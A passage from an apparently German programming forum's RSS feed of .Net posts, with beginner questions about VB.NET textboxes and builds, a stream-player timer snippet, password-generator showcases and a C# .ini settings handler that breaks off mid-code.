			<content:encoded><![CDATA[<div>Hey,<br />
<br />
Wie kann man in VB ein Bild als Hintergrund einer Textbox machen?<br />
Oder kann man sie vielleicht Transparent machen?<br />
<br />
Mfg.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/textbox-image-13724</guid>
		</item>
		<item>
			<title>VB.NET erstellt keine exe mehr im Release-Ordner</title>
			<link>net-94/vb-net-erstellt-keine-exe-mehr-release-ordner-32444?goto=newpost</link>
			<pubDate>Wed, 13 Jun 2012 20:52:05 GMT</pubDate>
			<description>Hey Com, 
 
 
Mein VB.Net 2010 erstellt irgenwie keine .exe mehr im Release ordner wo ist da den nun der Fehler ich habe an den einstellungen nichts...</description>
			<content:encoded><![CDATA[<div>Hey Com,<br />
<br />
<br />
Mein VB.Net 2010 erstellt irgenwie keine .exe mehr im Release ordner wo ist da den nun der Fehler ich habe an den einstellungen nichts geändert wäre froh wen mir da wer helfen könnte.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>AnqeL</dc:creator>
			<guid isPermaLink="true">net-94/vb-net-erstellt-keine-exe-mehr-release-ordner-32444</guid>
		</item>
		<item>
			<title>VB.Net (S) Hilfe bei 3 Sachen</title>
			<link>net-94/s-hilfe-bei-3-sachen-13557?goto=newpost</link>
			<pubDate>Wed, 13 Jun 2012 20:39:59 GMT</pubDate>
			<description>Hallo UH :D 
  
Ich wollte gerade eben mein Player updaten blos da ich z.Z. sehr wenig mit den Programm gemacht habe. 
 
Für Folgende Dinge wollte...</description>
			<content:encoded><![CDATA[<div>Hallo UH :D<br />
 <br />
Ich wollte gerade eben mein Player updaten blos da ich z.Z. sehr wenig mit den Programm gemacht habe.<br />
<br />
Für Folgende Dinge wollte ich was einfügen:<br />
- Tray.ERLEDIGT<br />
- Laufzeit anzeigen<br />
- Listener Anzeigen<br />
<br />
Für die Tray-Funktion habe ich schon was gefunden aber es funktioniert nicht :x kennt jmd vlt. da was anderes ?<br />
<br />
Für Listener habe ich jetzt auch keine Ahnung was ich da einfügen soll :x wollte es auf jedenfall über ein Label laufen lassen :x<br />
<br />
Für die Laufzeit habe ich diesen Code der aber dann nur für 1en Stream Gilt, ich brauche dies aber für ca. 10 streams und wollte dies immer nur dann gestartet haben wenn ein Stream Anfängt und wenn ein Stream gewechselt wird neu anfängt.<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Private StartTime As Date<br />
<br />
&nbsp;  Private Sub<br />
&nbsp;  StartTime = Date.Now<br />
&nbsp;  Timer1.Start()<br />
&nbsp;  'Code<br />
&nbsp;  Timer1.Stop()<br />
&nbsp;  End Sub<br />
<br />
&nbsp;  Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick<br />
<br />
&nbsp; &nbsp; &nbsp; Dim Ts As TimeSpan = Date.Now.Subtract(StartTime)<br />
&nbsp; &nbsp; &nbsp; Label1.Text = Ts.Hours.ToString(&quot;00&quot;) &amp; &quot;:&quot; &amp; _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Ts.Minutes.ToString(&quot;00&quot;) &amp; &quot;:&quot; &amp; _<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Ts.Seconds.ToString(&quot;00&quot;)<br />
&nbsp; &nbsp; &nbsp; Label1.Refresh()<br />
&nbsp;  End Sub</code><hr />
</div>
</div>
</div>
</div><br />
<br />
Wäre nett wenn mir welche helfen könnten :x<br />
<br />
Danke euch Schonmal :x <br />
<br />
lg Bazs</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/s-hilfe-bei-3-sachen-13557</guid>
		</item>
		<item>
			<title>VB.Net Generator</title>
			<link>net-94/generator-13483?goto=newpost</link>
			<pubDate>Tue, 12 Jun 2012 13:00:01 GMT</pubDate>
			<description>Hi, 
 
da ich seit kurzem (heute Morgen) wieder VisualBasic habe und ich keinerlei Kenntnisse mehr habe, habe ich einfachen PW Generator geschrieben....</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
da ich seit kurzem (heute Morgen) wieder VisualBasic habe und ich keinerlei Kenntnisse mehr habe, habe ich einfachen PW Generator geschrieben.<br />
<br />
<br />
<b>Funktionen:</b><br />
-Zahlen<br />
-Groß / Klein Buchstaben<br />
-In txt speichern<br />
<br />
<img src="https://u-img.net/img/4985Nv.png" border="0" alt="" /><br />
<br />
<br />
Kritik gerne gesehen.<br />
<br />
<a href="http://www.file-upload.net/download-4438126/pw.rar.html" target="_blank" rel="nofollow">Download</a></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Shane</dc:creator>
			<guid isPermaLink="true">net-94/generator-13483</guid>
		</item>
		<item>
			<title>VB.Net PW Generator</title>
			<link>net-94/pw-generator-13472?goto=newpost</link>
			<pubDate>Tue, 12 Jun 2012 06:27:46 GMT</pubDate>
			<description>Heyho, 
 
früher einer meiner ersten programmierten Programme habe ich gestern gefunden hihio. 
 
Programmiert zusammen mit Loshido (ka wie er jetzt...</description>
			<content:encoded><![CDATA[<div>Heyho,<br />
<br />
früher einer meiner ersten programmierten Programme habe ich gestern gefunden hihio.<br />
<br />
Programmiert zusammen mit Loshido (ka wie er jetzt heißt oder ob er noch existiert).<br />
<br />
Scheiß auf's Design :D<br />
<br />
<img src="https://u-img.net/img/5983Mm.png" border="0" alt="" /></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Shane</dc:creator>
			<guid isPermaLink="true">net-94/pw-generator-13472</guid>
		</item>
		<item>
			<title>C# Snippets</title>
			<link>net-94/snippets-12901?goto=newpost</link>
			<pubDate>Tue, 29 May 2012 19:55:07 GMT</pubDate>
			<description>Hier einfach irgendwelche Codesnippets posten, die ihr z.B. für eure Projekte benötigt habt, vielleicht kann jemand anders die ja auch verwenden :) 
...</description>
			<content:encoded><![CDATA[<div>Hier einfach irgendwelche Codesnippets posten, die ihr z.B. für eure Projekte benötigt habt, vielleicht kann jemand anders die ja auch verwenden :)<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<i>Kleiner .ini-Handler</i> <input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
Speichert und liest .ini-Dateien! Nur für kleine Projekte zu empfehlen:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Collections</span><span style="color: #007700">.</span><span style="color: #0000BB">Generic</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Linq</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">;<br /><br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">IO</span><span style="color: #007700">;<br /><br />namespace&nbsp;</span><span style="color: #0000BB">Fun<br /></span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;class&nbsp;</span><span style="color: #0000BB">SettingsHandler<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">#region&nbsp;Variables<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">private&nbsp;const&nbsp;</span><span style="color: #0000BB">char&nbsp;COMMENT_CHAR&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'#'</span><span style="color: #007700">;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;</span><span style="color: #0000BB">Dictionary</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">String</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">&gt;&nbsp;</span><span style="color: #0000BB">keyValues&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">Dictionary</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">string</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">string</span><span style="color: #007700">&gt;();<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;</span><span style="color: #0000BB">string&nbsp;fileName&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;</span><span style="color: #0000BB">StringBuilder&nbsp;configFileWriter&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">StringBuilder</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">#endregion<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;Initialisiert&nbsp;einen&nbsp;neuen&nbsp;SettingsHandler<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;/summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;param&nbsp;name="fileName"&gt;Die&nbsp;Datei&nbsp;in&nbsp;die&nbsp;geschrieben&nbsp;o.&nbsp;die&nbsp;gelesen&nbsp;werden&nbsp;soll&lt;/param&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">public&nbsp;</span><span style="color: #0000BB">SettingsHandler</span><span style="color: #007700">(</span><span style="color: #0000BB">string&nbsp;fileName</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">fileName&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">fileName</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">#region&nbsp;Alles&nbsp;zum&nbsp;Lesen<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;Liest&nbsp;eine&nbsp;Datei&nbsp;aus!<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;/summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">public&nbsp;</span><span style="color: #0000BB">void&nbsp;ReadFile</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!</span><span style="color: #0000BB">File</span><span style="color: #007700">.</span><span style="color: #0000BB">Exists</span><span style="color: #007700">(</span><span style="color: #0000BB">fileName</span><span style="color: #007700">))<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Die&nbsp;Datei&nbsp;existiert&nbsp;nicht!"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">StreamReader&nbsp;sr&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">StreamReader</span><span style="color: #007700">(</span><span style="color: #0000BB">fileName</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;line&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((</span><span style="color: #0000BB">line&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sr</span><span style="color: #007700">.</span><span style="color: #0000BB">ReadLine</span><span style="color: #007700">())&nbsp;!=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!</span><span style="color: #0000BB">line</span><span style="color: #007700">.</span><span style="color: #0000BB">StartsWith</span><span style="color: #007700">(</span><span style="color: #0000BB">COMMENT_CHAR</span><span style="color: #007700">.</span><span style="color: #0000BB">ToString</span><span style="color: #007700">()))<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">int&nbsp;splitChar&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">line</span><span style="color: #007700">.</span><span style="color: #0000BB">IndexOf</span><span style="color: #007700">(</span><span style="color: #DD0000">'='</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">splitChar&nbsp;</span><span style="color: #007700">!=&nbsp;-</span><span style="color: #0000BB">1</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;key&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">line</span><span style="color: #007700">.</span><span style="color: #0000BB">Substring</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">splitChar</span><span style="color: #007700">).</span><span style="color: #0000BB">Trim</span><span style="color: #007700">().</span><span style="color: #0000BB">ToUpper</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">string&nbsp;value&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">line</span><span style="color: #007700">.</span><span style="color: #0000BB">Substring</span><span style="color: #007700">(</span><span style="color: #0000BB">splitChar&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">).</span><span style="color: #0000BB">Trim</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">keyValues</span><span style="color: #007700">.</span><span style="color: #0000BB">Add</span><span style="color: #007700">(</span><span style="color: #0000BB">key</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">value</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">sr</span><span style="color: #007700">.</span><span style="color: #0000BB">Close</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">///&nbsp;&lt;summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;Holt&nbsp;einen&nbsp;Wert&nbsp;aus&nbsp;der&nbsp;gelesenen&nbsp;Datei<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;/summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;typeparam&nbsp;name="T"&gt;Der&nbsp;gewünschte&nbsp;Datentyp&nbsp;(z.B.&nbsp;String)&lt;/typeparam&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;param&nbsp;name="key"&gt;Der&nbsp;Schlüssel,&nbsp;unter&nbsp;dem&nbsp;der&nbsp;Wert&nbsp;gespeichert&nbsp;ist&lt;/param&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;returns&gt;Der&nbsp;Wert&lt;/returns&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">public&nbsp;</span><span style="color: #0000BB">T&nbsp;Get</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">T</span><span style="color: #007700">&gt;(</span><span style="color: #0000BB">string&nbsp;key</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">T&nbsp;returnvalue&nbsp;</span><span style="color: #007700">=&nbsp;default(</span><span style="color: #0000BB">T</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">keyValues</span><span style="color: #007700">.</span><span style="color: #0000BB">ContainsKey</span><span style="color: #007700">(</span><span style="color: #0000BB">key</span><span style="color: #007700">.</span><span style="color: #0000BB">ToUpper</span><span style="color: #007700">()))<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">returnvalue&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">T</span><span style="color: #007700">)</span><span style="color: #0000BB">Convert</span><span style="color: #007700">.</span><span style="color: #0000BB">ChangeType</span><span style="color: #007700">(</span><span style="color: #0000BB">keyValues</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">key</span><span style="color: #007700">&#93;,&nbsp;</span><span style="color: #0000BB">typeof</span><span style="color: #007700">(</span><span style="color: #0000BB">T</span><span style="color: #007700">));<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;ex</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Console</span><span style="color: #007700">.</span><span style="color: #0000BB">WriteLine</span><span style="color: #007700">(</span><span style="color: #DD0000">"ERROR&nbsp;WHILE&nbsp;LOADING&nbsp;SETTINGS:&nbsp;"&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">ex</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;</span><span style="color: #0000BB">returnvalue</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">#endregion<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#region&nbsp;Alles&nbsp;zum&nbsp;Schreiben<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;Fügt&nbsp;einen&nbsp;Wert&nbsp;hinzu<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;/summary&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;typeparam&nbsp;name="T"&gt;Die&nbsp;Art&nbsp;des&nbsp;zu&nbsp;schreibenden&nbsp;Wertes&lt;/typeparam&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;param&nbsp;name="key"&gt;Der&nbsp;Schlüssel,&nbsp;unter&nbsp;dem&nbsp;der&nbsp;Wert&nbsp;gespeichert&nbsp;wird&lt;/param&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&lt;param&nbsp;name="value"&gt;Der&nbsp;Wert&lt;/param&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">public&nbsp;</span><span style="color: #0000BB">void&nbsp;Write</span><span style="color: #007700">&lt;</span><span style="color: #0000BB">T</span><span style="color: #007700">&gt;(</span><span style="color: #0000BB">String&nbsp;key</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">T&nbsp;value</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">configFileWriter</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #0000BB">key</span><span style="color: #007700">).</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #DD0000">"&nbsp;=&nbsp;"</span><span style="color: #007700">).</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: 